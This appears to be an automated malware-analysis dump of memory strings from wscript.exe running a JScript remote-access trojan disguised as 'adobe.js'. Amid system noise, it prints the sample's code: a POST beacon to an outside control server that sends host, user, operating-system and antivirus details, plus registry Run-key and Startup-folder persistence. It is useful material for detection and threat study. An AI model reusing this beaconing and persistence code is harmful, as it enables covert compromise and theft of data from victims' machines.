Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: documents.mydocs@shell32.dll,-34575 | memstr_77b0e891-8 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: bluetooth file transfer.lnk@c:\windows\system32\fsquirt.exe,-2343 | memstr_5126b660-5 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: t1cw+^ | memstr_5430c520-8 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: sendto | memstr_1ac2bcad-f |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: sendto> | memstr_973d3884-b |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: kzsendto | memstr_77f12941-a |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: t1gzet | memstr_7d3fba82-0 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: recent> | memstr_14a166de-a |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: gzctgzet. | memstr_44c572f8-1 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: gzctgzet.( | memstr_debf1ef0-a |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: programsj | memstr_560de311-8 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: startuph | memstr_fc3f697c-b |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: startup@shell32.dll,-21787 | memstr_a937b204-b |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 'n3405117- | memstr_67f87594-e |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: clsid\{0e5aae11-a475-4c5b-ab00-c66de400274e}b00`a | memstr_8ef33666-1 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: clsid\{0e5aae11-a475-4c5b-ab00-c66de400274e}b00 | memstr_c80f3773-2 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: roami | memstr_58a25e18-4 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: js_szss | memstr_fd9941e1-6 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: eg_sze3 | memstr_17db54bb-f |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: usersfilesfolder | memstr_625fcdec-4 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 2025adobepr1m | memstr_c00b086c-4 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: adobe | memstr_7c5d5751-1 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: errornts^ | memstr_9148842e-0 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: typeerrorite | memstr_eef73547-3 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: adober | memstr_378610cd-c |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @shell32,dll,-12692q | memstr_ec5c0da0-6 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: clsid\{4590f811-1d3a-11d0-891f-00aa004b2e24}w | memstr_01bb7ba5-3 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: nes@a | memstr_80f3e96f-0 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: clsid\{172bddf8-ceea-11d1-8b05-00600806d9b6}e | memstr_992b09ee-6 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: clsid\{4590f811-1d3a-11d0-891f-00aa004b2e24}e | memstr_28741046-8 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: clsid\{172bddf8-ceea-11d1-8b05-00600806d9b6}pr | memstr_d44b3a07-2 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: clsid\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa} | memstr_24f11995-b |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: clsid\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}pr1mps | memstr_be2c1356-d |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: windo`e | memstr_b8e0ecac-9 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @tzres.dll,-112x | memstr_dee6b288-4 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: eastern standard time % | memstr_1265da8e-5 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @tzres.dll,-111 | memstr_b4a4dceb-a |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: eastern summer time | memstr_e7d28c66-f |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: dllwb | memstr_2198018a-5 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\windows\system32\wbem\wbemprox.dlll | memstr_4d376a3e-5 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\windows\system32\wbem\wbemdisp.dllrosoft | memstr_2128f178-8 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\windows\system32\wbem\wbemdisp.dlll | memstr_aeb1871d-5 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\windows\system32\wbem\wbemdisp.dll0v | memstr_27fe67ed-a |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: k.$xd | memstr_f2b80722-c |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\windows\system32\wbem\wmiutils.dlll | memstr_ff5e992b-e |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\windows\system32\wbem\wmiutils.dllr | memstr_98097dee-f |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\windows\system32\wbem\wmiutils.dlll\jon | memstr_4f3ca749-d |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\windows\system32\wbem\wbemprox.dlll782 | memstr_8355c298-6 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: security=impersonation dynamic falsen\j | memstr_893bab15-0 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ppdao | memstr_3543b7a1-b |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\windows\system32\wbem\wbemprox.dlll@ | memstr_a10bb4a0-6 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \device\harddiskvolume3w | memstr_8341e501-5 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: /c:\k | memstr_03aa987c-a |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\windows\system32\wbem\wbemsvc.dlll | memstr_14252a92-d |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: windows management and instrumentation | memstr_da4ec2f2-7 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \jon; | memstr_c3e4194a-1 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\windows\system32\wbem\wbemdisp.dlllc: | memstr_ce56a759-c |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: thoodell32 | memstr_a7a48a65-9 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ,-21786 | memstr_ec47be0a-5 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ,dmi | memstr_422c42c5-0 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: wbem locator | memstr_e22682a4-a |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: '$'<' | memstr_c2b255bc-c |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: mmnopqrs | memstr_3c813b02-9 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: b81a4609 | memstr_2ed71821-0 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: wmi object factory | memstr_984f87ca-c |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: >4>d> | memstr_fb2b08ab-1 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: l0l@lxlpl | memstr_109a4dc0-f |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: m$m@m`m | memstr_fc42a1dc-b |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: acdefghij | memstr_a9f7d4b4-4 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: jonesimv2 | memstr_de2e6e24-7 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: b81a46092 | memstr_eacd21c1-0 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: jones-pc2q | memstr_bc405e78-d |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: stujwxyz | memstr_036a14b1-5 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 6892type | memstr_8b2dc245-6 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: psfactorybuffer | memstr_9adddd81-9 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: universal refresher8 | memstr_8a933936-d |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: nt authority\system+ | memstr_1166acf9-1 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: appdata\local& | memstr_f2696760-5 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: wbem class object | memstr_53a41433-0 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: call contextd=x | memstr_b0c30590-2 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: local appdata-21786 | memstr_67e0adbd-8 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: l32.dll, | memstr_c0e2774d-6 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ^lb&! | memstr_00fbd412-8 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: hthe download of the specified resource has failed. | memstr_e8e3526d-d |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ware\microsoft\windows\currentversion\run\adobe". | memstr_93b347c5-2 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ones\appdata\r | memstr_a77dced6-a |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: invalid root in registry key "hkey_local_machine\software\microsoft\windows\currentversion\run\adobe".r | memstr_8df1b625-6 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: xwscript.exe //b "c:\users\user\appdata\local\temp\adobe.js"rosoft\windows\currentversion\run\adobe".e | memstr_dcc392ad-5 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: invalid root in registry key "hkey_local_machine\software\microsoft\windows\currentversion\run\adobe".t | memstr_519c90ab-e |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: invalid root in registry key "hkey_local_machine\software\microsoft\windows\currentversion\run\adobe".g | memstr_caf5fb99-8 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: xwscript.exe //b "c:\users\user\appdata\local\temp\adobe.js" | memstr_e0ec685f-9 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \windows\currentversion\run\adobe".i | memstr_b7478977-e |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: hkey_local_machine\software\microsoft\windows\currentversion\run\adobedows\currentversion\run\adobe". | memstr_834620d3-f |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: hkey_current_user\software\microsoft\windows\currentversion\run\adobendows\currentversion\run\adobe".+ | memstr_7af2780a-3 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: >microsoft jscript runtime errorey_local_machine\software\microsoft\windows\currentversion\run\adobe".i | memstr_baa77729-b |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ware\microsoft\windows\currentversion\run\adobe".i | memstr_eb48b557-5 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ware\microsoft\windows\currentversion\run\adobe".d | memstr_7c0f330f-7 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: invalid root in registry key "hkey_local_machine\software\microsoft\windows\currentversion\run\adobe".favoritesw | memstr_927ef14d-4 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: invalid root in registry key "hkey_local_machine\software\microsoft\windows\currentversion\run\adobe".; | memstr_14fd63aa-4 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: invalid root in registry key "hkey_local_machine\software\microsoft\windows\currentversion\run\adobe".* | memstr_743aad46-3 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 0onts | memstr_5e29749a-7 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ::$datas@shell32.dll,-21813 | memstr_f6ba610c-d |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ifilesystem3.drives(); | memstr_0c4097dc-e |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: idrivecollection._newenum(); | memstr_50f67083-b |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: idrive.isready(); | memstr_e7c66ea4-6 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: idrive.freespace(); | memstr_3243ce99-0 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: idrive.drivetype(); | memstr_f7249dad-6 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: iserverxmlhttprequest2.open("post", "http://lee44.kozow.com:6892/is-ready", "false"); | memstr_a910c877-f |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: iserverxmlhttprequest2.setrequestheader("user-agent:", "wshrat|b81a4609|user-pc|user|microsoft windows 10 pro|plus|windows defender .|false - 15/4/2025|jav"); | memstr_d29e70d6-e |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: iserverxmlhttprequest2.send(""); | memstr_0af4a07a-4 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ihost.sleep("5000"); | memstr_fe6cad85-c |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: iwshshell3.regwrite("hkey_current_user\software\microsoft\windows\currentversion\run\adobe", "wscript.exe //b "c:\users\user\appdata\local\temp\adobe.js"", "reg_sz"); | memstr_da0362c8-9 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: iwshshell3.regwrite("hkey_local_machine\software\microsoft\windows\currentversion\run\adobe", "wscript.exe //b "c:\users\user\appdata\local\temp\adobe.js"", "reg_sz"); | memstr_9e010d45-c |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ihost.scriptfullname(); | memstr_67585228-2 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ifilesystem3.copyfile("c:\users\user\appdata\local\temp\adobe.js", "c:\users\user\appdata\local\temp\adobe.js", "true"); | memstr_c20cee8a-b |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ifilesystem3.copyfile("c:\users\user\appdata\local\temp\adobe.js", "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\st", "true"); | memstr_17c43e61-1 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: indows 10 pro|plus|windows defender .|false - 15/4/2025|jav"); | memstr_6f8b09ab-8 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: on._newenum(); | memstr_c01b0a69-7 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ::$dataon._newenum(); | memstr_8864aa06-f |
Source: wscript.exe, 00000008.00000002.2595501978.000000A4685FD000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: m32\gdi3p | memstr_8abb32f4-a |
Source: wscript.exe, 00000008.00000002.2595501978.000000A4685FD000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: +local\sm0:5872:304:wilstaging_02_p0hl | memstr_120b6f71-5 |
Source: wscript.exe, 00000008.00000002.2595501978.000000A4685FD000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: `p@ra | memstr_931592ce-8 |
Source: wscript.exe, 00000008.00000002.2595501978.000000A4685FD000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: /5rr | memstr_e5cc213c-2 |
Source: wscript.exe, 00000008.00000002.2595501978.000000A4685FD000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: wsh-timer | memstr_b22a05ee-e |
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: {7584717 - | memstr_f2513939-a |
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: 16bd0} | memstr_35fb5f1b-a |
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\desktop.ini/h | memstr_68efbcdf-6 |
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: \microsoft\w | memstr_be1fe8f8-1 |
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: dows\start menu\rams\startup | memstr_aa4dcb85-5 |
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: {7584717 | memstr_26094694-5 |
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\desktop.ini | memstr_64d228a0-d |
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: dows\start menu\rams6 | memstr_9d9b06d5-1 |
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: :hg/h | memstr_31ed5f75-c |
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: ++c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\desktop.ini | memstr_b7deb3de-f |
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: \pk/h | memstr_1a16cd20-a |
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: em32\she | memstr_0f3d0643-e |
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: zdwpt | memstr_c7091b58-5 |
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: programs | memstr_dc32ff98-0 |
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: @da\r @ | memstr_bf8ed880-4 |
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: @shell32.dll,-21782 | memstr_e10cfa61-0 |
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: \user\appdata\roaming\m | memstr_8bdb8fb2-d |
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: 476751002 | memstr_253ef14f-2 |
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: @at}0 | memstr_a8b6d860-3 |
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: ntfst | memstr_517b911a-c |
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: c:\users\user\appdata\local\temp\adobe.js | memstr_d92382f5-8 |
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: p^/@n | memstr_59add5eb-6 |
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: 3++s++ | memstr_832dc305-e |
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: the specified resource h | memstr_84e7db63-9 |
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: dvm<i | memstr_08a90107-1 |
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: sleep | memstr_5f13d8af-5 |
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: wc:\users\user\appdata\local\temp\adobe.js'r | memstr_261eca8e-2 |
Source: wscript.exe, 00000008.00000002.2595457149.000000A4682F5000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: c:\windows\system32\wscript.exe | memstr_cbc13aba-7 |
Source: wscript.exe, 00000008.00000002.2595677350.000000A468AFC000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: 247675102476751002 | memstr_3c7b3248-0 |
Source: wscript.exe, 00000008.00000002.2595677350.000000A468AFC000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: s-1-5-21-2246122658-3693405117-24767 | memstr_861a7809-5 |
Source: wscript.exe, 00000008.00000002.2595677350.000000A468AFC000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: 2476751002 | memstr_08586e71-e |
Source: wscript.exe, 00000008.00000002.2595677350.000000A468AFC000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: tdll.dll | memstr_a01fee1b-e |
Source: wscript.exe, 00000008.00000002.2595677350.000000A468AFC000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: lee44.kozow.com | memstr_ffdf08bc-5 |
Source: wscript.exe, 00000008.00000002.2595677350.000000A468AFC000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: prxyh# | memstr_1dd1ea74-4 |
Source: wscript.exe, 00000008.00000002.2596539768.000001F861CAF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: xwscript.exe //b "c:\users\user\appdata\local\temp\adobe.js" | memstr_027be00a-5 |
Source: wscript.exe, 00000008.00000002.2596539768.000001F861CAF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: glxwscript.exe //b "c:\users\user\appdata\local\temp\adobe.js" | memstr_6a027d1e-5 |
